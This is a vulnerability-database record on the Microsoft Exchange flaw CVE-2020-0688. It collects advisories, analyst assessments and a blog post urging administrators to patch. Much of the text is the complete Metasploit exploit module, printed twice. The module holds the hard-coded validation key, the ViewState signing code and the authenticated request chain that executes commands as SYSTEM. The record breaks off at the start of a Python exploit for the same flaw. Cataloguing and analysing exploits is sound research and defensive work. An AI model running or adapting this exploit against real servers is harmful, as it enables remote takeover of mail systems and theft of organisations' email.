"AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "href": "https://attackerkb.com/topics/XbYcn2Mckk/cve-2020-0688---exchange-control-panel-viewstate-deserialization-bug", "type": "attackerkb", "title": "CVE-2020-0688 - Exchange Control Panel Viewstate Deserialization Bug", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-168750", "CVE-2020-17132"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka \u2018Microsoft Exchange Server Remote Code Execution Vulnerability\u2019. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 09, 2020 6:14pm UTC reported:\n\nThere\u2019s more info in Rapid7\u2019s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February\u2019s Exchange vuln. I\u2019m interested to see how [Steven Seeley\u2019s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. Might be cause for quick re-evaluation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-09-11T00:00:00", "id": "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "href": "https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875", "type": "attackerkb", "title": "CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-29T00:32:41", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n", "modified": "2020-10-22T00:00:00", "published": "2020-10-16T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "description": "Aka \u2018Microsoft Exchange Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 12, 2021 7:07pm UTC reported:\n\nThis is vulnerability is a bypass for the patch issued for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875>). The vulnerability was also identified and analyzed by Steven Seeley. The patch can be bypassed using call operators as described in Seeley\u2019s blog [Making Clouds Rain RCE in Office 365](<https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html>).\n\nThe original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-12-10T00:00:00", "id": "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "href": "https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132", "type": "attackerkb", "title": "CVE-2020-17132", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:52", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Microsoft Exchange Servers affected by a remote code execution vulnerability, known as CVE-2020-0688, continue to be an attractive target for malicious cyber actors. A remote attacker can exploit this vulnerability to take control of an affected system that is unpatched.\n\nAlthough Microsoft disclosed the vulnerability and provided software patches for the various affected products in February 2020, advanced persistent threat actors are targeting unpatched servers, according to recent open-source reports. The Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators review [Microsoft\u2019s Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) and the [National Security Agency\u2019s tweet](<https://twitter.com/NSAGov/status/1236099750610563074>) on CVE-2020-0688 for more information and apply the necessary patches as soon as possible.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688>); we'd welcome your feedback.\n", "modified": "2020-03-10T00:00:00", "published": "2020-03-10T00:00:00", "id": "CISA:18E5825084F7681AD375ACB5B1270280", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688", "type": "cisa", "title": "Unpatched Microsoft Exchange Servers Vulnerable to CVE-2020-0688", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T07:27:55", "description": "This module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these values, an attacker can craft a special ViewState to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Exchange Control Panel ViewState Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'bindata'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n # include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exchange Control Panel ViewState Deserialization',\n 'Description' => %q{\n This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0688'],\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2020-02-11',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n 'Privileged' => true\n ))\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ false, 'The domain to use for authentication', '' ])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n ])\n end\n\n def check\n state = get_request_setup\n viewstate = state[:viewstate]\n return CheckCode::Unknown if viewstate.nil?\n\n viewstate = Rex::Text.decode_base64(viewstate)\n body = viewstate[0...-20]\n signature = viewstate[-20..-1]\n\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\n return CheckCode::Safe\n end\n\n # we've validated the signature matches based on the data we have and thus\n # proven that we are capable of signing a viewstate ourselves\n CheckCode::Vulnerable\n end\n\n def generate_viewstate(generator, session_id, cmd)\n viewstate = ::Msf::Util::DotNetDeserialization.generate(\n cmd,\n gadget_chain: :TextFormattingRunProperties,\n formatter: :LosFormatter\n )\n signature = generate_viewstate_signature(generator, session_id, viewstate)\n Rex::Text.encode_base64(viewstate + signature)\n end\n\n def generate_viewstate_signature(generator, session_id, viewstate)\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\n mac_key_bytes << Rex::Text.to_unicode(session_id)\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\n end\n\n def exploit\n state = get_request_setup\n\n # the major limit is the max length of a GET request, the command will be\n # XML escaped and then base64 encoded which both increase the size\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded, opts={state: state})\n else\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\n end\n end\n\n def execute_command(cmd, opts)\n state = opts[:state]\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\n 5.times do |iteration|\n # this request *must* be a GET request, can't use POST to use a larger viewstate\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => state[:cookies].join(''),\n 'agent' => state[:user_agent],\n 'vars_get' => {\n '__VIEWSTATE' => viewstate,\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\n }\n })\n break\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\n sleep iteration\n end\n end\n\n def get_request_setup\n # need to use a newer default user-agent than what Metasploit currently provides\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\n 'method' => 'POST',\n 'agent' => user_agent,\n 'vars_post' => {\n 'password' => datastore['PASSWORD'],\n 'flags' => '4',\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa'), vhost_uri: true),\n 'username' => username\n }\n })\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\n cookies = [res.get_cookies]\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => res.get_cookies,\n 'agent' => user_agent\n })\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\n cookies << res.get_cookies\n\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\n if viewstate_generator.nil?\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\n else\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\n end\n\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\n if viewstate.nil?\n vprint_warning('Failed to find the __VIEWSTATE value')\n end\n\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n if session_id.nil?\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\n end\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\n\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\n end\n\n def username\n if datastore['DOMAIN'].blank?\n datastore['USERNAME']\n else\n [ datastore['DOMAIN'], datastore['USERNAME'] ].join('\\\\')\n end\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_ecp_viewstate.rb"}], "taosecurity": [{"lastseen": "2020-04-07T15:42:39", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "[](<https://1.bp.blogspot.com/-3z5xWliAyNA/XoyXtcOtaNI/AAAAAAAA_oc/Uy9Yzi4j07AtCMWr2pqem1y9kOOxa8gmQCLcBGAsYHQ/s1600/Servers%2Bvulnerable%2Bto%2BCVE-2020-0688.png>) \n--- \nCVE-2020-0688 Scan Results, per Rapid7 \n \ntl;dr -- it's the title of the post: \"If You Can't Patch Your Email Server, You Should Not Be Running It.\" \n \nI read a [disturbing story today](<https://www.bleepingcomputer.com/news/security/80-percent-of-all-exposed-exchange-servers-still-unpatched-for-critical-flaw/>) with the following news: \n \n\"Starting March 24, Rapid7 used its Project Sonar internet-wide survey tool to discover all publicly-facing Exchange servers on the Internet and the numbers are grim. \n \nAs they found, **'at least 357,629 (82.5%) of the 433,464 Exchange servers' are still vulnerable to attacks that would exploit the CVE-2020-0688 vulnerability.** \n \nTo make matters even worse,** some of the servers that were tagged by Rapid7 as being safe against attacks might still be vulnerable** given that 'the related Microsoft update wasn\u2019t always updating the build number.' \n \nFurthermore, **'there are over 31,000 Exchange 2010 servers that have not been updated since 2012**,' as the Rapid7 researchers observed. '**There are nearly 800 Exchange 2010 servers that have never been updated**.' \n \nThey also found **10,731 Exchange 2007 servers** and more than 166,321 Exchange 2010 ones, with the former** already running End of Support (EoS) software that hasn't received any security updates since 2017** and the latter reaching EoS in October 2020.\" \n \nIn case you were wondering, [threat actors have already been exploiting these flaws](<https://www.bleepingcomputer.com/news/security/nsa-warns-about-microsoft-exchange-flaw-as-attacks-start/>) for weeks, if not months. \n \nEmail is one of, if not the most, sensitive and important systems upon which organizations of all shapes and sizes rely. The are, by virtue of their function, inherently exposed to the Internet, meaning they are within the range of every targeted or opportunistic intruder, worldwide. \n \nIn this particular case, unpatched servers are also vulnerable to any actor who can download and update Metasploit, which is virtually 100% of them. \n \nIt is the height of negligence to run such an important system in an unpatched state, when there are much better alternatives -- namely, outsourcing your email to a competent provider, like Google, Microsoft, or several others. \n \nI expect some readers are saying \"I would never put my email in the hands of those big companies!\" That's fine, and I know several highly competent individuals who run their own email infrastructure. The problem is that they represent the small fraction of individuals and organizations who can do so. Even being extremely generous with the numbers, it appears that less than 20%, and probably less than 15% according to other estimates, can even keep their Exchange servers patched, let alone properly configured. \n \nIf you think it's still worth the risk, and your organization isn't able to patch, because you want to avoid megacorp email providers or government access to your email, you've made a critical miscalculation. You've essentially decided that it's more important for you to keep your email out of megacorp or government hands than it is to keep it from targeted or opportunistic intruders across the Internet. \n \nIncidentally, you've made another mistake. Those same governments you fear, at least many of them, will just leverage Metasploit to break into your janky email server anyway. \n \nThe bottom line is that unless your organization is willing to commit the resources, attention, and expertise to maintaining a properly configured and patched email system, you should outsource it. Otherwise you are being negligent with not only your organization's information, but the information of anyone with whom you exchange emails.\n\nCopyright 2003-2020 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com)", "modified": "2020-04-07T15:28:11", "published": "2020-04-07T15:28:00", "id": "TAOSECURITY:CF99A8E68CF7727296D8451EE445844C", "href": "https://taosecurity.blogspot.com/2020/04/if-you-cant-patch-your-email-server-you.html", "type": "taosecurity", "title": "If You Can't Patch Your Email Server, You Should Not Be Running It", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:41:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is required to exploit this vulnerability. The specific flaw exists within the Exchange Control Panel web application. The product fails to generate a unique cryptographic key at installation, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "edition": 1, "modified": "2020-06-22T00:00:00", "published": "2020-02-20T00:00:00", "id": "ZDI-20-258", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-258/", "title": "Microsoft Exchange Server Exchange Control Panel Fixed Cryptographic Key Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2020-09-02T19:37:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "description": "**Name**| owa_rce \n---|--- \n**CVE**| CVE-2020-0688 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| owa_rce \n**Notes**| CVE Name: CVE-2020-0688 \nVENDOR: Microsoft \nNOTES: This exploit has been tested on Microsoft Exchange Server 2016 CU 15 \n \nVersionsAffected: VERSIONS \nRepeatability: Infinite \nReferences: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688 \nDate public: 2/20/2020 \nCVSS: 8.8 \n\n", "edition": 1, "modified": "2020-02-11T22:15:00", "published": "2020-02-11T22:15:00", "id": "OWA_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/owa_rce", "title": "Immunity Canvas: OWA_RCE", "type": "canvas", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-03-05T03:14:28", "description": "This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. With knowledge of these, values an attacker can craft a special viewstate to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.", "edition": 1, "published": "2020-03-05T00:00:00", "title": "Exchange Control Panel Viewstate Deserialization Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-05T00:00:00", "id": "1337DAY-ID-34051", "href": "https://0day.today/exploit/description/34051", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend\n\n# 0day.today [2020-03-05] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34051"}, {"lastseen": "2020-03-04T17:20:27", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "1337DAY-ID-34037", "href": "https://0day.today/exploit/description/34037", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2020-0688-Photubias.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n This is a native implementation without requirements, written in Python 2.\r\n Works equally well on Windows as 